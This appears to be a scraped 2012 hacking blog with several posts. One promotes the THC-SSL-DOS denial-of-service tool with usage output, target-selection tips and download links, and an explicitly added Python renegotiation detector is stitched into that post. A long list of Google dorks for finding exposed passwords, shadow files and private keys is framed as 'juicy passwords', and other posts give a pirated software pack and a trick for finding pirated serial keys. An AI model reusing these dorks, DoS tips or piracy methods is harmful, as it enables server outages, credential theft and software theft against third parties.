
30 January 2012

THC SSL DoS/DDoS Tool



A German group of hackers known as Hackers Choice has released a program they assert will allow a single computer to take down a Web server using a secure connection.

THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet.

This problem affects all SSL implementations today. Vendors have been aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure renegotiation feature to trigger thousands of renegotiations via a single TCP connection.

Usage:
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Comparing flood DDoS vs. SSL-Exhaustion attack:

A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server.

This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link.

Traditional DDoS attacks based on flooding are suboptimal: Servers are prepared to handle large amounts of traffic, and clients are constantly sending requests to the server even when not under attack.

The SSL handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large numbers of SSL handshakes.

The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for whitehats


  1. The average server can do 300 handshakes per second. This would require 10-25% of your laptop's CPU.
  2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
  3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, ... or the secure database port).

Countermeasures:

No real solution exists. The following steps can mitigate (but not solve) the problem:
  1. Disable SSL-Renegotiation
  2. Invest in an SSL Accelerator
Either of these countermeasures can be circumvented by modifying THC-SSL-DOS. A better solution is desirable. Somebody should fix this.
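
How the handshake pressure described above can be spotted in server telemetry, as an added defender-side example that is not part of the original post or of the THC tool: it flags clients by renegotiations per connection and by completed handshakes per second. The event format, the thresholds, the function names and the addresses (documentation ranges) are assumptions constructed for this example.

```python
from collections import defaultdict, deque

KINDS = ("initial", "renegotiation")


def build_sample():
    """Constructed events, one per completed handshake, in time order:
    '<ms> <client_ip> <conn_id> <initial|renegotiation>' (assumed format)."""
    ev = [
        # Ordinary client: three connections in a minute, one renegotiation.
        (0, "192.0.2.10", "c1", "initial"),
        (20000, "192.0.2.10", "c2", "initial"),
        (25000, "192.0.2.10", "c1", "renegotiation"),
        (40000, "192.0.2.10", "c3", "initial"),
    ]
    # Client holding 10 connections and renegotiating about 80 times/second.
    ev += [(100000 + i * 10, "198.51.100.7", f"r{i}", "initial") for i in range(10)]
    ev += [(101000 + k * 12, "198.51.100.7", f"r{k % 10}", "renegotiation")
           for k in range(160)]
    # Client that never renegotiates: 30 fresh handshakes within 0.6 s.
    ev += [(200000 + i * 20, "203.0.113.5", f"n{i}", "initial") for i in range(30)]
    return [f"{t} {ip} {conn} {kind}" for t, ip, conn, kind in sorted(ev)]


def detect(lines, window_ms=1000, max_per_window=20, max_reneg_per_conn=3):
    """Return {client_ip: [reasons]} for clients exceeding either threshold.
    Thresholds are illustrative assumptions; tune them to measured baselines."""
    recent = defaultdict(deque)   # ip -> handshake timestamps inside the window
    reneg = defaultdict(int)      # (ip, conn_id) -> renegotiations seen
    findings = defaultdict(set)
    for line in lines:
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit() or parts[3] not in KINDS:
            continue              # ignore malformed lines instead of crashing
        ts, ip, conn, kind = int(parts[0]), parts[1], parts[2], parts[3]
        window = recent[ip]
        window.append(ts)
        while ts - window[0] >= window_ms:
            window.popleft()      # drop handshakes older than the window
        if len(window) > max_per_window:
            findings[ip].add("handshake-rate")
        if kind == "renegotiation":
            reneg[(ip, conn)] += 1
            if reneg[(ip, conn)] > max_reneg_per_conn:
                findings[ip].add("renegotiation-count")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}


if __name__ == "__main__":
    for ip, reasons in sorted(detect(build_sample()).items()):
        print(ip, ", ".join(reasons))
```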

You can download THC-SSL-DOS here:

Windows: thc-ssl-dos-1.4-win-bin.zip
Linux: thc-ssl-dos-1.4.tar.gz

Enjoy...

27 January 2012

Google Funny Tricks 2012



The Google search box not only analyzes our search string and displays perfect results but also provides a variety of features such as currency conversions, movie timings, weather forecasts, a calculator, etc.

However, there is something funny about Google Calculator. Look at these screenshots:

Google calculator also provides answers to queries such as:


  • What’s the answer to life, the universe and everything multiplied by the speed of light divided by three teaspoons?

  • How many seconds in a decade?

  • What’s 98.6 degrees Fahrenheit in Celsius?

  • How many feet in a smoot?

  • Number of horns on a unicorn?

  • What is a googol?

  • What is 1.21 gigawatts divided by 88 miles per hour?

  • What is 1.21 gigawatts multiplied by 88 miles per hour?

  • What is 1 hogshead in litres?

  • What is 30 gigabytes divided by 192kbps?

  • What is 1 furlong per minute?

  • What is 13000 watts to horsepower?

  • How many km in a light year?

  • How many teaspoons in a pint?

  • How many megabytes in an exabyte?

  • What is 125444987 in binary?

  • What is 2008 in roman numerals?

  • What is 100 USD to AUD?

  • What is the mass of the Sun in pounds?

  • What is the square root of 123456789?

Enjoy...

    26 January 2012

    Mobius Forensic Toolkit 0.5.10–Forensics Framework




    Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.

    Installation

    As root, type:
    python setup.py install
    
    Usage
    Run mobius_bin.py.
    You can download Mobius 0.5.10 here:
    mobiusft-0.5.10.tar.gz

    mobiusft-0.5.10.zip

    Enjoy...

    19 January 2012

    Add a Free Chat Box Widget to Your Blogspot Blog




    Here’s the easiest way to add a free Blogger chat box widget (also known as shoutbox, chatterbox, or chat room) to your Blogspot blog. Adding a chat box widget to your blog is an easy way to build community on your site and keep your visitors coming back. It’s so easy we can do it in less than a minute. We’ll use Chatroll live communities to create a chat box widget, customize it, and add it to your Blogger layout.
    Here’s a screenshot of a Blogger blog with a chat box embedded in the main column:


    These steps are easy enough for anyone, but if you have any trouble, you can contact Chatroll Support via live chat or email. Let’s get straight to it!
    Create a Chatroll live community to use for your chat box.
    Go to Chatroll, enter your community’s name in the “Name Your Live Community…” box and click “Create”. Choose a name that fits with your blog, as this name will appear in the chat box title. Write an attractive and detailed description so that people can easily find your new Chatroll community (this will also help drive traffic to your blog).

    Copy the chat window embed code from your live community’s home page.
    In your new live community’s home page (the page that is shown after your community has been successfully created) copy the embed code from the text box labeled ‘embed’. This text box is located under the chat window, as shown below:

    Edit your Layout in Blogger.
    In Blogger, click on the “Layout” tab to show your blog’s layout:

    Add a new HTML/Javascript gadget.
    On your blog’s layout screen, click the “Add a Gadget” link to open the Add a Gadget window:
    In the Add a Gadget window, scroll down and find the “HTML/Javascript” gadget. Click on the “+” icon to add it.



    Paste the Chatroll embed code into the HTML/Javascript gadget.
    On the new HTML/Javascript gadget screen, enter a title for the gadget. A good title should alert your readers that this is your site’s live chat. Here’s the important part: Paste the chat window embed code into the Content area (this is the code you copied from Chatroll in step 2):

    Finally, click “Save”. The gadget should now be visible in your blog’s layout.
    That’s it! You’ve just chat-enabled your Blogger or Blogspot blog! You can now use the Blogger Layout tab to drag the chat box widget wherever you want in your blog’s layout.
    Here are a few more tips for best results:
    Position the chat box so it appears on every page: For best results, place the chat box where it will appear on every page, so that your readers can continue their conversation even if they move from one page to another within your blog.
    Match the chat box colors and size to your blog’s template: To further maximize your chat widget’s success, you’ll want to customize it to match your site design. Chatroll lets you customize the position, size, and color of the chat to fit in perfectly with your blog’s template. Each time you customize the chat, simply click “Edit” on the chat gadget in the Blogger Layout page and re-paste the embed code.
    Enjoy...

    18 January 2012

    Game Programming Basics




    DirectX

    - http://www.c-unit.com/tutorials/
    - http://www.sunlightd...indows/DirectX/
    - http://msdn.microsoft.com/directx/ --Microsoft Official DX website--
    - http://www.drunkenhyena.com/
    - http://www.two-kings...orials/d3d.html


    OpenGL


    - http://www.gamedev.net
    - http://www.flipcode.com (also has some really good Win32 tuts)
    - http://www.gamasutra.com
    - http://nehe.gamedev.net
    - http://www.opengl.org
    - http://www.lighthouse3d.com
    - http://www.opengl.or..._1.0/index.html good

    Allegro/AllegroGL


    - http://www.talula.demon.co.uk/allegro/
    - http://allegrogl.sourceforge.net/
    - http://www.grandgent.com/allegro/faq/
    - http://www.grandgent...ace/vivace.html - really good..
    - http://www.loomsoft....lltut_index.htm

    Other

    - http://devpaks.org/
    - http://www.3dcafe.com/asp/meshes.asp 3D models for your games
    - http://www.devmaster.net/
    - http://www.humus.ca/
    Enjoy...

    16 January 2012

    List of FTP Sites -Free mp3,videos and Softwares



     Enjoy...

    15 January 2012

    AIO - Mega Software Pack 2011




    AIO - Mega Software Pack 2011 [Multi / Eng]
    [RAR | Pack | Installs | XP/Vista/7 | 492 MB]

    description:

    Software Mega Pack 2011. The latest release, with software that has been registered and genuine software activated for life. Includes software to do anything and everything, such as compression, extraction, image viewing and editing, browsing, download acceleration, game development, game recording, installer creation, chatting, media playback, screenshot recording, icon creation, DVD image mounting, operating system activation, gamepad emulation... ALL IN ONE.

    content:

    * 7z file manager, WinZip, WinRAR (all entries)
    * ACDSee Pro (The best image viewer and editor)
    * Browser Pack (superior browsers to enhance the browsing experience)
    * Fraps (game recording and benchmarking)
    * I Screen Recorder and Snagit (screenshot recording)
    * Install Creator Pro (for the creation of an installer)
    * Pack Messenger (For Exchange Fora)
    * Media Players Pack (reproductions of all audio and video formats)
    * Copy of Tera (increase the speed of copy)
    * And much more ..

    Technical Data:

    RAM: Minimum 256 MB
    HDD: +150 MB free for decompression
    Operating System: Windows XP/Vista/7
    Interface: English
    Language: Multilingual
    Compression: RAR
    Format: ISO and / or Installer
    Uploader: Blade Master 666




    Enjoy...

    14 January 2012

    Microsoft Math graphing calculator



    Is the calculator that ships with Windows by default not enough for you?

    The calculator has been a default in Windows since the release of Windows 1.0, and although it received a total renovation and a bunch of new features in Windows 7, it is still not powerful enough for most equations in algebra and advanced mathematics.
    On the other hand, the free PowerToy calculator that was released with XP does not work in Windows 7 or Vista, and for a time the only graphing calculator solution for PC users has been online tools such as WolframAlpha.com.
    That has changed since Microsoft released Microsoft Math 4. Previously a commercial program, Microsoft Math 4 is now completely free for Windows users. It is a great application that can solve equations, differentiate or integrate, and create 2D and 3D graphs. Whether you're using the keyboard or a tablet device, you can solve your math questions quickly. In addition, the application uses the ribbon interface, so it is easy to learn and use.

    Microsoft Math can solve equations, differentiate or integrate, and even show you the steps to find the answer. While some teachers may fear it being used to cheat, it's actually a great way to understand how to solve more complex problems on which you would otherwise have stalled. Then, on the Graphing tab, you can create 2D and 3D graphs in seconds. Zoom in or out with the scroll wheel. The graphics are incredibly smooth for a utility application like this! Microsoft added seven skins to change the look of the calculator. To see them, just go to the View tab and then Skins.

    It is a very useful application, especially if you or someone in your family is still in school. In fact, the only problem is that you might be tempted to use it to solve your difficult math problem instead of using your gray matter!

    Files in this download: MSetup_x64.exe, 18.7MB

    System requirements:
    Supported operating systems: Windows 7, Windows Server 2003 Service Pack 2, Windows Server 2008 R2, Windows Server 2008 Service Pack 2, Windows Vista Service Pack 2, Windows XP Service Pack 3
    Microsoft .NET Framework 3.5 SP1 (free download)
    Computer with a 500 MHz Pentium processor or equivalent (minimum); 1 GHz Pentium or equivalent (recommended)
    256 MB of RAM (minimum); 512 MB or more (recommended)
    Display resolution 800 x 600, 256 (minimum); 1024 x 768, 32 bits (recommended)
    Video card with 64 MB of video RAM
    65 MB of disk space available

    It may or may not seem useful to everyone, but at least for me it was very useful.





    Enjoy...

    13 January 2012

    How to get the serial number you need



    * Go to Google.

    * In the search field type: "Product name" 94FBR

    * Where, "Product Name" is the name of the item you want to find the serial number for.

    * And voila - there you go - the serial number you needed.

    HOW DOES THIS WORK?

    Quite simple really. 94FBR is part of an Office 2000 Pro CD key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94FBR, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

    See these example searches:

    "Photoshop 7" 94FBR
    "Age of Mythology" 94FBR
    "Nero Burning Rom 5.5" 94FBR

    Enjoy...

    12 January 2012

    Password Dorks Google -Google Password Hacking



    Here are some Google dorks that will get you some juicy passwords. Have fun:

    "admin account info" filetype:log
    ! Host=*.* intext :enc_UserPassword=* ext:pcf
    "# -FrontPage-" ext:pwd inurl: (service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password =*" "http://*:*@www" domainname
    "index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site: sourceforge.net
    "parent directory" +proftpdpasswd
    "powered by ducalendar" -site:duware.com "Powered by Duclassified" -site: duware.com
    "Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
    "powered by duclassmate" - site:duware.com
    "Powered by Dudirectory" -site:duware.com "powered by dudownload" -site: duware.com
    "Powered By Elite Forum Version *.*"
    "Powered by Link Department"
    "sets mode: +k"
    "your password is" filetype:log
    " Powered by DUpaypal" -site: duware.com
    allinurl: admin mdb auth_user_file.txt
    config.php
    eggdrop filetype:user user
    enable password | secret "current configuration" -intext : the
    etc (index.of)
    ext:asa | ext:bak intext :uid intext :pwd -"uid..pwd" database | server | dsn
    ext:inc "pwd=" "UID=" ext:ini eudora.ini
    ext:ini Version=4.0.0.4 password ext:passwd -intext :the - sample -example
    ext:txt inurl:unattend. txt
    ext:yml database inurl:config filetype:bak createobject sa
    filetype: bak inurl:"htaccess|passwd|shadow| htusers"
    filetype:cfg mrtg "target[*]" - sample -cvs -example
    filetype:cfm "cfapplication name" password filetype: conf oekakibbs
    filetype:conf slapd.conf filetype:config config intext : appSettings "User ID"
    filetype:dat "password .dat"
    filetype:dat inurl:Sites. dat
    filetype:dat wand.dat
    filetype:inc dbconn
    filetype:inc intext : mysql_connect
    filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep
    filetype:ini inurl:"serv-u.ini"
    filetype:ini inurl: flashFXP.ini
    filetype:ini ServUDaemon filetype:ini wcx_ftp
    filetype:ini ws_ftp pwd
    filetype:ldb admin
    filetype:log "See `ipsec --copyright"
    filetype:log inurl:"password .log"
    filetype:mdb inurl: users.mdb
    filetype:mdb wwforum filetype:netrc password filetype:pass pass intext :userid
    filetype:pem intext : private
    filetype:properties inurl:db intext :password filetype:pwd service filetype:pwl pwl
    filetype:reg reg +intext :"defaultusername" +intext :"defaultpassword"
    filetype:reg reg +intext :”WINVNC3”
    filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
    filetype:sql "insert into" (pass|passwd|password )
    filetype:sql ("values * MD5" | "values * password " | "values * encrypt";)
    filetype:sql ("passwd values" | " password values" | "pass values" )
    filetype:sql +"IDENTIFIED BY" -cvs
    filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@"
    filetypels username password email
    htpasswd
    htpasswd / htgroup
    htpasswd / htpasswd.bak
    intext:"enable password 7"
    intext :"enable secret 5 {:content:}quot;
    intext:"powered by EZGuestbook"
    intext:"powered by Web Wiz Journal" intitle:"index of" intext :connect.inc intitle:"index of" intext :globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content
    intitle:"phpinfo()" +"mysql. default_password" +"Zend Scripting Language Engine"
    intitle:dupics inurl: (add.asp | default.asp | view.asp | voting.asp) -site:duware.com
    intitle: index.of administrators.pwd
    intitle: Index.of etc shadow
    intitle:index.of intext :"secring.skr"|"secring. pgp"|"secring.bak"
    intitle:rapidshare intext :login
    inurl:"calendarscript/users. txt"
    inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
    inurl:"GRC. DAT" intext :"password "
    inurl:"Sites. dat"+"PASS="
    inurl:"slapd.conf" intext :"credentials" -manpage -"Manual Page" -man: -sample
    inurl:"slapd.conf" intext :"rootpw" -manpage -"Manual Page" -man: -sample
    inurl:"wvdial. conf" intext :"password "
    inurl:/db/main. mdb
    inurl:/wwwboard
    inurl:/yabb/ Members/Admin.dat
    inurl:ccbill filetype:log
    inurl:cgi-bin inurl:calendar. cfg
    inurl:chap-secrets -cvs
    inurl:config. php dbuname dbpass
    inurl:filezilla.xml -cvs
    inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd - man
    inurl:nuke filetype:sql
    inurl:ospfd. conf intext :password -sample -test - tutorial -download
    inurl:pap-secrets - cvs
    inurl:pass.dat
    inurl:perform filetype: ini
    inurl:perform.ini filetype:ini
    inurl: secring ext:skr | ext:pgp | ext:bak
    inurl: server.cfg rcon password inurl: ventrilo_srv.ini adminpassword
    inurl: vtund.conf intext :pass -cvs
    inurl:zebra. conf intext :password -sample -test - tutorial -download
    LeapFTP intitle:"index.of./" sites.ini modified master.passwd
    mysql history files NickServ registration passwords
    passlist passlist.txt (a better way)
    passwd passwd / etc (reliable)
    people.lst psyBNC config files
    pwd.db
    server-dbs "intitle:index of"
    signin filetype:url spwd.db / passwd
    trillian.ini
    wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
    [WFClient] Password = filetype:ica
     
    Enjoy...


    HaCk-O-PeDia - The Hacker's Encyclopedia. Copyright 2010 All Rights Reserved To Ankit